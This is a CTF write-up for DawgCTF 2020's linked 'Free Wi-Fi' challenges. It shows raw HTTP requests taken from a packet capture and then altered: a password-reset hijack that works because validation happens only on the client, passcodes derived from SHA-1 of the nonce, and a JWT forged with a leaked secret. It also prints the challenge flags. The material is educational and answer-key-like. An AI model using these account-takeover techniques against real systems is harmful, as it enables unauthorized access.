CTFtime.org / DawgCTF 2020 / free wifi part 4 / Writeup

# DawgCTF 2020 – Free Wi-Fi

These are multiple challenges connected together. The same [PCAP file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/Free%20Wi-Fi/free-wifi.pcap) is given for all the challenges.

Challenges are ordered considering the number of points.

## Free Wi-Fi Part 1

* **Category:** web/networking
* **Points:** 50

### Challenge

> People are getting online here, but the page doesn't seem to be implemented...I ran a pcap to see what I could find out.
>
> http://freewifi.ctf.umbccd.io/
>
> Authors: pleoxconfusa and freethepockets

### Solution

The HTML code of the page is the following.

```html

<html>
<head>
<title>
Guest Sign In Portal
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

</head>
<body>

<h1>Sorry!</h1>

<div align="left" style="background-color: lightgrey; width: 500px; padding: 50px; margin: 20px;">
<h3 style="color:blue;">Guest login</h3>

Guest sign in portal is not yet implemented.

</div>

</div>
</div>
</div>

So there is anything to authenticate there.

Analyzing the [PCAP file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/Free%20Wi-Fi/free-wifi.pcap) you can discover on packet #6 the existence of `https://freewifi.ctf.umbccd.io/staff.html` web page.

Connecting to it, you will discover the flag.

```
DawgCTF{w3lc0m3_t0_d@wgs3c_!nt3rn@t!0n@l}
```

## Free Wi-Fi Part 3

* **Category:** web/networking
* **Points:** 200

### Challenge

> Let's steal someone's account.
>
> http://freewifi.ctf.umbccd.io/
>
> Authors: pleoxconfusa and freethepockets

### Solution

The authentication page discovered during the previous step is the following.

```html

<html>
<head>
<title>
Staff Wifi Login Page
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

</head>
<body>

<h1>Welcome to the staff login page!</h1>

<h3 style="color:blue;">Staff login</h3>

You may use either of the following methods to logon.

<div class="form-group "><label class="control-label" for="username">Username:</label>

<input class="form-control" id="username" name="username" type="text" value="">

</div>

<div class="form-group "><label class="control-label" for="password">Password:</label>

<input class="form-control" id="password" name="password" type="password" value="">

</div>

</form>

Forgot your password?

<div class="form-group required"><label class="control-label" for="passcode">Login with WifiKey:</label>

<input class="form-control" id="passcode" name="passcode" required type="text" value="">

</div>

</form>

</div>

DawgCTF{w3lc0m3_t0_d@wgs3c_!nt3rn@t!0n@l}

</div>
</div>
</div>

Analyzing the [PCAP file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/Free%20Wi-Fi/free-wifi.pcap), some interesting packets can be found: #469, #471 and #473.

```
POST /forgotpassword.html HTTP/1.1
Host: freewifi.ctf.umbccd.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://freewifi.ctf.umbccd.io/forgotpassword.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Cookie: WifiKey nonce=MjAyMC0wNC0wOCAxNzowMw==; session=eyJjc3JmX3Rva2VuIjoiYTg4ZWQxZjVkODhhZTgyZDEzMWY4ODhmZWExZjYwNDRmNTEwMDgyMCJ9.Xo35dQ.zpNEVjf6uG_5vhqwNCE7bS8QEz0
Connection: keep-alive
Upgrade-Insecure-Requests: 1

user=true.grit%40umbccd.io&csrf_token=ImE4OGVkMWY1ZDg4YWU4MmQxMzFmODg4ZmVhMWY2MDQ0ZjUxMDA4MjAi.Xo4F8w.YzjziKX2qgE4hJ5QKC6qTjP2-0M&email=true.grit%40umbccd.io&submit=Submit

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2420
Vary: Cookie
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Wed, 08 Apr 2020 17:12:19 GMT

<html>
<head>
<title>
Forgot your password?
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

</head>
<body>

<h1>Forgot your password?</h1>

Please enter your email address.

<div class="form-group required"><label class="control-label" for="email">Enter your email:</label>

<input class="form-control" id="email" name="email" required type="text" value="">

</div>

</form>
<script type="text/javascript">
window.onload = function()
{
document.getElementsByClassName('form')[0].onsubmit = function() {
alert(1)
var email = document.getElementById('email')
var user = document.getElementById('user')
user.value = email.value
}
}
</script>

Check your email for password reset link.

</div>
</div>
</div>

You have discovered that:
1. a `/forgotpassword.html` page exists;
2. `[email protected]` is a user of the system;
3. the forgot password functionality uses two different fields for username and e-mail, with a JavaScript code to copy the value inserted into the input field.

As a consequence, it is sufficient to intercept the request and change the e-mail with one you control, leaving the discovered username.

```
POST /forgotpassword.html HTTP/1.1
Host: freewifi.ctf.umbccd.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Origin: https://freewifi.ctf.umbccd.io
Connection: close
Referer: https://freewifi.ctf.umbccd.io/forgotpassword.html
Cookie: WifiKey nonce=MjAyMC0wNC0xMCAyMzozNA==; WifiKey alg=SHA1; session=eyJjc3JmX3Rva2VuIjoiYTA2MmZkNTUyNzM3NmQwMTAxYTc4YzgwMmFlNmFkOTI5ZGQzNzU3OCJ9.XpD3NA.zDj47SdpKQnikt--V9WnN0zUmYQ; JWT 'identity'=31337
Upgrade-Insecure-Requests: 1

user=true.grit%40umbccd.io&csrf_token=ImEwNjJmZDU1MjczNzZkMDEwMWE3OGM4MDJhZTZhZDkyOWRkMzc1Nzgi.XpEDtg.QX6HWsJN_M2Apsv3wUSKn4AIhl4&email=m3ssap0%40yopmail.com&submit=Submit

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Apr 2020 23:40:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie
Content-Length: 2018

<html>
<head>
<title>
Forgot your password?
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

</head>
<body>

<h1>Forgot your password?</h1>

<div align="left" style="background-color: lightgrey; width: 500px; padding: 50px; margin: 20px;">
<h3 style="color:blue;">Password recovery</h3>

<form action="" method="post"
class="form" role="form">
<input id="user" name="user" type="hidden" value="[email protected]">
<input id="csrf_token" name="csrf_token" type="hidden" value="ImEwNjJmZDU1MjczNzZkMDEwMWE3OGM4MDJhZTZhZDkyOWRkMzc1Nzgi.XpED1g.iElwyWg_AQH1c72HhtcOPZVr02s">

<div class="form-group required"><label class="control-label" for="email">Enter your email:</label>

<input class="form-control" id="email" name="email" required type="text" value="[email protected]">

</div>

</form>
<script type="text/javascript">
window.onload = function()
{
document.getElementsByClassName('form')[0].onsubmit = function() {
var email = document.getElementById('email')
var user = document.getElementById('user')
user.value = email.value
}
}
</script>

DawgCTF{cl!3nt_s1d3_v@l!d@t!0n_1s_d@ng3r0u5}

</div>
</div>
</div>
</div>

The flag is the following.

```
DawgCTF{cl!3nt_s1d3_v@l!d@t!0n_1s_d@ng3r0u5}
```

## Free Wi-Fi Part 4

* **Category:** web/networking
* **Points:** 250

### Challenge

> People seem to have some doohickey that lets them login with a code...
>
> http://freewifi.ctf.umbccd.io/
>
> Authors: pleoxconfusa and freethepockets

### Solution

Connecting to the web site, two interesting cookies are set:

```
Set-Cookie: WifiKey nonce=MjAyMC0wNC0xMCAyMzo1Mg==; Path=/
Set-Cookie: WifiKey alg=SHA1; Path=/
```

Analyzing the [PCAP file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/Free%20Wi-Fi/free-wifi.pcap), some POST requests passing `passcode` value can be found. Considering the SHA-1 algorithm discovered before in the cookie value and applying that algorithm to the wi-fi nonces captured, you will discover that `passcode` values are just the first 8 chars of the hashed `nonce` value.

```
#85
Cookie: WifiKey nonce=MjAyMC0wNC0wOCAxNzowMQ== -> 2020-04-08 17:01
passcode=5004f47a
SHA-1(MjAyMC0wNC0wOCAxNzowMQ==) = 5004f47ae3e2e7c1c9a5ea4d1666f95e6b06b062

#217
Cookie: WifiKey nonce=MjAyMC0wNC0wOCAxNzowMg== -> 2020-04-08 17:02
passcode=01c7aeb1
SHA-1(MjAyMC0wNC0wOCAxNzowMg==) = 01c7aeb11b1ee82035e9dc9e0292088d559921b1

#339
Cookie: WifiKey nonce=MjAyMC0wNC0wOCAxNzowMw== -> 2020-04-08 17:03
passcode=097b3acf
SHA-1(MjAyMC0wNC0wOCAxNzowMw==) = 097b3acf84e6ed9e66f285cf3750b4ff89da48dc

#655
Cookie: WifiKey nonce=MjAyMC0wNC0wOCAxNzoxMw== -> 2020-04-08 17:13
passcode=54f03ae2
SHA-1(MjAyMC0wNC0wOCAxNzoxMw==) = 54f03ae2cc8d1415bf06dec1670e03fd4e696982
```

The same process can be applied to your `nonce`.

```
Cookie: WifiKey nonce=MjAyMC0wNC0xMSAwMDowNw== -> 2020-04-11 00:07
SHA-1(MjAyMC0wNC0xMSAwMDowNw==) = ef07d9f7a0f3cce235a644fbb8392f211025aa98
passcode=ef07d9f7
```

In order to perform a request.

```
POST /staff.html HTTP/1.1
Host: freewifi.ctf.umbccd.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: https://freewifi.ctf.umbccd.io
Connection: close
Referer: https://freewifi.ctf.umbccd.io/staff.html
Cookie: WifiKey nonce=MjAyMC0wNC0xMSAwMDowNw==; WifiKey alg=SHA1; session=eyJjc3JmX3Rva2VuIjoiYTA2MmZkNTUyNzM3NmQwMTAxYTc4YzgwMmFlNmFkOTI5ZGQzNzU3OCJ9.XpD3NA.zDj47SdpKQnikt--V9WnN0zUmYQ; JWT 'identity'=31337
Upgrade-Insecure-Requests: 1

csrf_token=ImEwNjJmZDU1MjczNzZkMDEwMWE3OGM4MDJhZTZhZDkyOWRkMzc1Nzgi.XpEKKA.bAfOYEeMNYEl-nFUD9XT9rSH0YI&passcode=ef07d9f7&submit=Submit

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 11 Apr 2020 00:07:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: WifiKey nonce=MjAyMC0wNC0xMSAwMDowNw==; Path=/
Set-Cookie: WifiKey alg=SHA1; Path=/
Set-Cookie: JWT 'secret'="dawgCTF?heckin#bamboozle"; Path=/
Vary: Cookie
Content-Length: 2594

<html>
<head>
<title>
Staff Wifi Login Page
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

</head>
<body>

<h1>Welcome to the staff login page!</h1>

<h3 style="color:blue;">Staff login</h3>

You may use either of the following methods to logon.

<div class="form-group "><label class="control-label" for="username">Username:</label>

<input class="form-control" id="username" name="username" type="text" value="">

</div>

<div class="form-group "><label class="control-label" for="password">Password:</label>

<input class="form-control" id="password" name="password" type="password" value="">

</div>

</form>

Forgot your password?

</form>

</div>

DawgCTF{k3y_b@s3d_l0g1n!}

</div>
</div>
</div>

The flag is the following.

```
DawgCTF{k3y_b@s3d_l0g1n!}
```

## Free Wi-Fi Part 2

* **Category:** web/networking
* **Points:** 300

### Challenge

> I saw someone's screen and it looked like they stayed logged in, somehow...
>
> http://freewifi.ctf.umbccd.io/
>
> Authors: pleoxconfusa and freethepockets

### Solution

At this point, you can spot two interesting cookies:
* `JWT 'identity'=31337`;
* `JWT 'secret'="dawgCTF?heckin#bamboozle"`.

Analyzing the capture, you can find two packets, #261 and #263, regarding a JWT-related endpoint.

```
GET /jwtlogin HTTP/1.1
Host: freewifi.ctf.umbccd.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: WifiKey nonce=MjAyMC0wNC0wOCAxNzowMg==; session=eyJjc3JmX3Rva2VuIjoiYTg4ZWQxZjVkODhhZTgyZDEzMWY4ODhmZWExZjYwNDRmNTEwMDgyMCJ9.Xo35dQ.zpNEVjf6uG_5vhqwNCE7bS8QEz0
Connection: keep-alive
Upgrade-Insecure-Requests: 1

HTTP/1.0 401 UNAUTHORIZED
Content-Type: application/json
Content-Length: 125
WWW-Authenticate: JWT realm="Login Required"
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Wed, 08 Apr 2020 17:02:35 GMT

{
"description": "Request does not contain an access token",
"error": "Authorization Required",
"status_code": 401
}
```

You can use [JWT.io website](https://jwt.io/) to craft a valid JWT with `31337` identity and signed with `dawgCTF?heckin#bamboozle` secret.

```
{"alg":"HS256","typ":"JWT"}.{"identity":31337,"iat":1586564945,"nbf":1586564945,"exp":1586908800}.Hx0gLrzRZy4lGdEhvV_eIpdpSSa_pd6FQVBy1pMVNPE

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6MzEzMzcsImlhdCI6MTU4NjU2NDk0NSwibmJmIjoxNTg2NTY0OTQ1LCJleHAiOjE1ODY5MDg4MDB9.Hx0gLrzRZy4lGdEhvV_eIpdpSSa_pd6FQVBy1pMVNPE
```

Calling the endpoint with the JWT in the `Authorization` header will give you the flag.

```
GET /jwtlogin HTTP/1.1
Host: freewifi.ctf.umbccd.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: WifiKey nonce=MjAyMC0wNC0xMSAwMDoxNg==; WifiKey alg=SHA1; session=eyJjc3JmX3Rva2VuIjoiYTA2MmZkNTUyNzM3NmQwMTAxYTc4YzgwMmFlNmFkOTI5ZGQzNzU3OCJ9.XpD3NA.zDj47SdpKQnikt--V9WnN0zUmYQ; JWT 'identity'=31337; JWT 'secret'="dawgCTF?heckin#bamboozle"
Authorization: JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6MzEzMzcsImlhdCI6MTU4NjU2NDk0NSwibmJmIjoxNTg2NTY0OTQ1LCJleHAiOjE1ODY5MDg4MDB9.Hx0gLrzRZy4lGdEhvV_eIpdpSSa_pd6FQVBy1pMVNPE
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 11 Apr 2020 00:35:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 27

DawgCTF{y0u_d0wn_w!t#_JWT?}
```

Original writeup (https://github.com/m3ssap0/CTF-Writeups/blob/master/DawgCTF%202020/Free%20Wi-Fi/README.md).

free wifi part 4

Comments

Sign in with